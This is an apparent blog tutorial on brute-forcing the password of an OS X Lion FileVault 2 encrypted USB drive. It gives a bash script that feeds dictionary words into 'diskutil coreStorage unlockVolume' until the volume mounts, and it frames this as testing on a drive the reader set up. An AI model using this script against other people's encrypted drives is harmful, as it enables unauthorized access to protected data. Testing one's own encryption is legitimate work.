I was curious if I could script a dictionary attack against one of the OSX Lion File Vault v2 encrypted external drives. If you haven’t done it. You need to be on Lion. Grab a spare USB storage stick. Make sure to backup any data from the device first. Encrypting the device by the book will erase and destroy the existing contents.

  1. Go into “Disk Utility”
  2. Plug in the desired USB storage stick
  3. Click on the device in the list
  4. Click on the Erase tab
  5. Pull down the Format box and choose one of the Encrypted options like: Mac OS Extended (Journaled, Encrypted)
  6. Click Erase
  7. When prompted provide a desired password.

Now that you have setup an encrypted device you can use that to test this process.

  1. First eject the usb device
  2. Unplug it
  3. Plug it back in
  4. Click cancel and do not enter the passphrase

Now onto the rest of the process.

Each encrypted volume gets a unique identifier. You need to know this ID to put into the script we will use to loop through our password dictionary. Go to a terminal session and issue the following command.

diskutil coreStorage list

We can see the volume ID of our device. In our below example the ID is B75621A3-C3F5-40B4-A441-37ECA3F4CD14 Copy that ID.

CoreStorage logical volume groups (1 found)
|
+-- Logical Volume Group BF468AAA-6532-4BFE-9B0D-FA4C5169737F
    =========================================================
    Name:         test
    Sequence:     1
    Free Space:   0 B (0 B)
    |
    +-< Physical Volume 0EA1F87D-DDE8-47A1-A424-F7D0FC7D0DAB
    |   ----------------------------------------------------
    |   Index:    0
    |   Disk:     disk3s1
    |   Status:   Online
    |   Size:     1010786304 B (1.0 GB)
    |
    +-> Logical Volume Family 7D96757D-734A-4174-BEF8-74BA48EDFFC0
        ----------------------------------------------------------
        Sequence:               2
        Encryption Status:      Unlocked
        Encryption Type:        AES-XTS
        Encryption Context:     Present
        Conversion Status:      NoConversion
        Has Encrypted Extents:  Yes
        Conversion Direction:   -none-
        |
        +-> Logical Volume B75621A3-C3F5-40B4-A441-37ECA3F4CD14
            ---------------------------------------------------
            Disk:               disk4
            Status:             Online
            Sequence:           2
            Size (Total):       953106432 B (953.1 MB)
            Size (Converted):   -none-
            Revertible:         No
            LV Name:            test
            Volume Name:        test
            Content Hint:       Apple_HFS

Create the below script file. Use VI in terminal or your favorite editor of choice. Replace the DEVICEIDHERE from the script with the ID from your device. Save the script and then make sure to make the script executable using chmod +x on the script file.

#!/bin/bash

for word in $(cat /Volumes/ExternalDrive/Dictionaries/test.txt | grep -v "#")

do

echo -n $word | diskutil coreStorage unlockVolume DEVICEIDHERE -stdinpassphrase

if [[ $? = 0 ]]

then

echo "Password found!"

echo $word

exit 0

fi

done

echo "Password not found."

exit 1

Now make yourself a password text file named test.txt with several passwords in it. Include the actual password. Make sure to fix the path to the text.txt file appropriately in the for line from the script.

Fire off the script and you should see your attached device mount when it hits the actual password from the list.

There you go. Just edit in the appropriate device ID and repeat as needed.

TwitterFacebookGoogle BookmarksLinkedInInstapaperGoogle ReaderPosterousStumbleUponShare